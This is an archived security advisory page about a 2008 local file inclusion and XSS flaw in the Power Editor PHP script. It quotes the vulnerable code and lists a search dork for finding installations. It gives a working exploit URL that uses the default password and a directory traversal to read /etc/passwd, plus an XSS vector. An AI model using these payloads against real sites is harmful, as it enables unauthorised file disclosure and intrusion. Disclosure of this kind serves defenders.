Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : Power Editor LOCAL FILE INCLUSION Vulnerbility
  SecurityAlert : 3864
  CVE : CVE-2008-2115
  CVE : CVE-2008-2116
  SecurityRisk : Medium  alert  (About)
  Remote Exploit : No
  Local Exploit : Yes
  Exploit Given : Yes
  Credit : Virangar Security Team
  Published : 10.05.2008

  Affected Software : Power Editor



  Advisory Text :  


########################################################################


#
#

# ..:::::Power Editor LOCAL FILE INCLUSION Vulnerbility ::::...
#

########################################################################


Virangar Security Team

www.virangar.net

--------

Discoverd By :Virangar Security Team (hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

-----------------------------------

download:http://www.scriptsez.net/index.php?action=details&cat=Content%2

0Management&id=1063623812

dork: Powered By Power Editor

-----------------------------------

vuln code in editor.php:

line 84-94:

if ($action=="tempedit") {

$n=base64_decode($m);

if ($n==$password){

template();

$te=$HTTP_GET_VARS['te'];

$dir=$HTTP_GET_VARS['dir'];

$filename = "$dir/$te";

$fd = fopen ($filename, "r");

$stuff = fread ($fd, filesize ($filename));

fclose ($fd);

?>

-------

vuln:

http://site.com/editor.php?action=tempedit&m=[base64
password]&te=[local_file]&dir=[local_dir]

examp:

editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../..

/../../../../../..

-------------------------------------

and xss here :D :

http://site.com/editor.php?action=tempedit&m=[base64
password]&te=[xss]&dir=[xss]

-----

note:

default pass for login is:changeme

-----

young iranian h4ck3rz





  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache-SSL memory
   disclosure

» Apache mod_negotiation
   Xss and Http Response
   Splitting

» Apache (mod_status)
   Refresh Header - Open
   Redirector (XSS)

» Apache (mod_proxy_ftp)
   Undefined Charset UTF-7
   XSS Vulnerability

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.